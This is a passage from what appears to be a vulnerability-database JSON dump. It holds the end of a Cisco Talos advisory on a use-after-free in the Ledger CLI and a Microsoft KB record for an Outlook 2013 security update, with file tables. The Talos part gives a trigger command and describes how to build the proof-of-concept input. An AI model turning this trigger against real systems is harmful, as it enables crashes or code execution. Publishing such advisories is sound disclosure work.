Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n ==20621==ABORTING\n \n\n### Exploit Proof-of-Concept\n\nSimply run the ledger binary with the provided proof-of-concept as an argument followed by the command type. Both `xml` and `register` will trigger the vulnerability.\n \n \n $ ledger -f poc.sample [xml|register]\n \n\nThe proof-of-concept simply needs to have an account entry within it that includes a deferred posting. This means that a line must exist that begins with a number to specify an account directive. Then before the next account directive, there must be something within \u2018<\u2019 and \u2018>\u2019 symbols. This will enter the path that will dereference a function pointer.\n\n### Timeline\n\n2017-04-07 - Vendor Disclosure \n2017-08-30 - Public Release\n\n##### Credit\n\nDiscovered by Cory Duplantis and another member of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0366\n\nPrevious Report\n\nTALOS-2017-0303\n", "edition": 6, "modified": "2017-08-30T00:00:00", "published": "2017-08-30T00:00:00", "id": "TALOS-2017-0304", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0304", "title": "Ledger CLI Account Directive Use-After-Free Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2021-01-01T22:37:54", "bulletinFamily": "microsoft", "cvelist": [], "description": "<html><body><p>Describes a security update that fixes vulnerabilities in Microsoft Office. The most severe of these vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><span></span>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://technet.microsoft.com/library/security/ms16-107\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-107</a>.<br/><br/><span class=\"text-base\">Note</span> To apply this security update, you must have the release version of <a href=\"https://support.microsoft.com/help/2817430\" id=\"kb-link-3\" target=\"_self\">Service Pack 1 for Microsoft Office 2013</a> installed on the computer.<br/><br/>For a complete list of affected versions of Microsoft Office software, see Microsoft Knowledge Base article <a href=\"https://support.microsoft.com/help/3185852\" id=\"kb-link-4\" target=\"_self\">KB3185852</a>.<br/><br/></div><h2>Improvements and fixes</h2><div class=\"kb-symptoms-section section\"> This security update contains improvements and fixes for the following nonsecurity issues:<br/> <ul class=\"sbody-free_list\"><li>Enable\u00a0the <a href=\"http://dev.office.com/reference/add-ins/office-add-in-requirement-sets\" id=\"kb-link-5\" target=\"_self\">DialogAPI 1.1</a>\u00a0requirement that is set in Office 2013 applications and\u00a0the <a href=\"http://dev.office.com/reference/add-ins/office-add-in-requirement-sets\" id=\"kb-link-6\" target=\"_self\">Mailbox 1.4</a>\u00a0requirement that is set in Outlook 2013.<br/></li><li> Translate some terms in multiple languages to make sure that the meaning is accurate.<br/></li><li>Assume that you disable read receipt functionality in Outlook 2013. When you receive email messages that have a requested SMIME receipt, local copies of email messages bloat the Versions folder on the server that is running Exchange.<br/></li><li>When you forward IRM email messages, the content is attached as an .msg attachment instead of being inserted into the message body in the new email message.<br/></li><li>A non-default Retention policy that is applied to shared mailboxes in Outlook does not apply to subfolders that are created in those mailboxes by any user who has permissions to that mailbox in Cached Exchange mode. This causes messages that are moved to those subfolders to inherit the parent folder's retention policy and not honor the policy set by the user. Therefore, the message can be deleted during the wrong period.<br/></li><li>When you move a junk email message from the Junk E-Mail folder, and you try to download the email message again in Outlook 2013, the email message is moved to the Junk E-Mail folder again.<br/></li><li>When you use a meeting request in Outlook 2013, Outlook crashes randomly.<br/></li></ul></div><h2>How to get and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\"> Method 1: Microsoft Update </h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see the \"Turn on automatic updating in Control Panel\" section of <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-8\" target=\"_self\">this Safety & Security Center article</a>.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=3118280\" id=\"kb-link-9\" target=\"_self\">Microsoft Update Catalog</a>\u00a0website.</div><h3 class=\"sbody-h3\">Method 3: Microsoft Download Center</h3><div class=\"kb-collapsible kb-collapsible-expanded\">You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/> <ul class=\"sbody-free_list\"><li><img alt=\" Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/EN-US/Download.gif\" title=\" Download \"/><a href=\"http://www.microsoft.com/download/details.aspx?familyid=797da3d0-d337-4db5-a222-8baf48d11ab4\" id=\"kb-link-10\" target=\"_self\">Download the security update KB3118280 for the 32-bit version of Outlook 2013</a></li><li><img alt=\" Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/EN-US/Download.gif\" title=\" Download \"/><a href=\"http://www.microsoft.com/download/details.aspx?familyid=6060baf6-8ac9-4555-9ccb-64705a9390a7\" id=\"kb-link-11\" target=\"_self\">Download the security update KB3118280 for the 64-bit version of Outlook 2013</a></li></ul></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Security update deployment information</h3> For deployment information about this update, see Microsoft Knowledge Base article <a href=\"https://support.microsoft.com/help/3185852\" id=\"kb-link-12\" target=\"_self\">KB3185852</a>.<br/><h3 class=\"sbody-h3\">Security update replacement information</h3> This security update doesn't replace any previously released update.<br/><h3 class=\"sbody-h3\">File hash information</h3><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Package name</th><th class=\"sbody-th\">Package hash SHA 1</th><th class=\"sbody-th\">Package hash SHA 2</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook2013-kb3118280-fullfile-x86-glb.exe</td><td class=\"sbody-td\">CC6AA103504A0A60554FFB41C43E76E55ACB530A</td><td class=\"sbody-td\">77CD29BA08B948F388F7873FAEBF54D783B0A0CA0F4BEE7AC4EFBF143E976D8F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook2013-kb3118280-fullfile-x64-glb.exe</td><td class=\"sbody-td\">BEA071667BAF8335B94B502AF16351F6689CFBE1</td><td class=\"sbody-td\">FFF48AF8603524A9C355C8EE9D38913C2CE811DE32B3650FF20BE529E4B2B3AF</td></tr></table></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"> The English version of this security update has the file attributes (or later file attributes) that are listed in the following table.<br/> <h4 class=\"sbody-h4\">For all supported x86-based versions of Outlook 2013</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File identifier</th><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1025</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1245436</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1026</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1414086</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1029</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1388086</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1030</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1281500</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1031</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1322192</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1032</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1495374</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_3082</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1393496</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1061</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1409458</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1035</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1393502</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1036</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1360252</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1037</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1238122</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1081</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1293080</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1050</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1276672</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1038</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1366370</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1057</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1328352</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1040</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1420674</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1041</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">883800</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1087</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1379060</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1042</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">928938</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1063</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1458586</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1062</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1484324</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1086</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1321510</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1044</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1350150</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1043</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1389782</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1045</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1453862</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1046</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1401136</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_2070</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1429978</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1048</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1377076</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1049</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1367530</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1051</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1373186</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1060</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1300764</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_2074</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1293258</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1053</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1272966</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1054</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1350986</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1055</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1302248</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1058</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1476630</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1066</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1581912</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_2052</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">957594</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlook.hol_1028</td><td class=\"sbody-td\">outlook.hol</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1000090</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:48</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">activity.cfg_1025</td><td class=\"sbody-td\">activity.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">984</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">appt.cfg_1025</td><td class=\"sbody-td\">appt.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">770</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">cnfnot.cfg_1025</td><td class=\"sbody-td\">cnfnot.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">296</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">cnfres.cfg_1025</td><td class=\"sbody-td\">cnfres.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">319</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">contact.cfg_1025</td><td class=\"sbody-td\">contact.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">781</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">currency.htm_1025</td><td class=\"sbody-td\">currency.htm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">635</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dadshirt.htm_1025</td><td class=\"sbody-td\">dadshirt.htm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">570</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">distlist.cfg_1025</td><td class=\"sbody-td\">distlist.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">803</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">doc.cfg_1025</td><td class=\"sbody-td\">doc.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">757</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">envelopr.dll_1025</td><td class=\"sbody-td\">envelopr.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">18584</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">exitem.cfg_1025</td><td class=\"sbody-td\">exitem.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">828</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">faxext.ecf_1025</td><td class=\"sbody-td\">faxext.ecf</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">826</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">infomail.cfg_1025</td><td class=\"sbody-td\">infomail.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">612</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ipm.cfg_1025</td><td class=\"sbody-td\">ipm.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">789</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">judgesch.htm_1025</td><td class=\"sbody-td\">judgesch.htm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">594</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">jungle.htm_1025</td><td class=\"sbody-td\">jungle.htm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">600</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">mapir.dll_1025</td><td class=\"sbody-td\">mapir.dll</td><td class=\"sbody-td\">15.0.4763.1000</td><td class=\"sbody-td\">1232560</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">note.cfg_1025</td><td class=\"sbody-td\">note.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">781</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">notebook.htm_1025</td><td class=\"sbody-td\">notebook.htm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">580</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">offisupp.htm_1025</td><td class=\"sbody-td\">offisupp.htm</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">556</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ooftmpl.cfg_1025</td><td class=\"sbody-td\">ooftmpl.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">813</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outllibr.dll_1025</td><td class=\"sbody-td\">outllibr.dll</td><td class=\"sbody-td\">15.0.4859.1000</td><td class=\"sbody-td\">7813864</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlperf.ini_1025</td><td class=\"sbody-td\">outlperf.ini</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">5060</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">outlwvw.dll_1025</td><td class=\"sbody-td\">outlwvw.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">127104</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">pmailext.ecf_1025</td><td class=\"sbody-td\">pmailext.ecf</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">626</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">post.cfg_1025</td><td class=\"sbody-td\">post.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">764</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">postit.cfg_1025</td><td class=\"sbody-td\">postit.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">775</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rclrpt.cfg_1025</td><td class=\"sbody-td\">rclrpt.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">810</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">recall.cfg_1025</td><td class=\"sbody-td\">rec.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1210</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">remote.cfg_1025</td><td class=\"sbody-td\">remote.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">766</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">repltmpl.cfg_1025</td><td class=\"sbody-td\">repltmpl.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">818</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">report.cfg_1025</td><td class=\"sbody-td\">report.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">778</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">resend.cfg_1025</td><td class=\"sbody-td\">resend.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">789</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rssitem.cfg_1025</td><td class=\"sbody-td\">rssitem.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">776</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">schdcncl.cfg_1025</td><td class=\"sbody-td\">schdcncl.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">804</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">schdreq.cfg_1025</td><td class=\"sbody-td\">schdreq.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">1183</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">schdresn.cfg_1025</td><td class=\"sbody-td\">schdresn.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">823</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">schdresp.cfg_1025</td><td class=\"sbody-td\">schdresp.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">823</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">schdrest.cfg_1025</td><td class=\"sbody-td\">schdrest.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">829</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">secrec.cfg_1025</td><td class=\"sbody-td\">secrec.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">642</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">secure.cfg_1025</td><td class=\"sbody-td\">secure.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">631</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sharing.cfg_1025</td><td class=\"sbody-td\">sharing.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">756</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sign.cfg_1025</td><td class=\"sbody-td\">sign.cfg</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">649</td><td class=\"sbody-td\">24-Aug-16</td><td 